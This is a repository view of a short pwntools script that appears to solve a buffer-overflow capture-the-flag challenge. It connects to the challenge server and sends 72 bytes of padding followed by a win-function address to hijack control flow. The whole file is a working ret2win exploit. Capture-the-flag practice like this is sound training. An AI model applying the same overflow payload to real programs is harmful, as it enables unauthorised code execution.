Files
OffSec-CTF/BOF/05_mini_game_arena/solve.py
2026-05-09 20:58:42 +02:00

19 lines
319 B
Python

#!/usr/bin/env python3
from pwn import *
context.binary = elf = ELF('./mini_game', checksec=False)
#p = process(elf.path)
p = remote('offsec.m0lecon.it', 13509)
# Your exploit here
OFFSET = 72
win = 0x4011fb
payload = flat(
b'A'*OFFSET,
win,
)
p.send(payload)
#p.send(b'cat flag\n')
#p.recv()
p.interactive()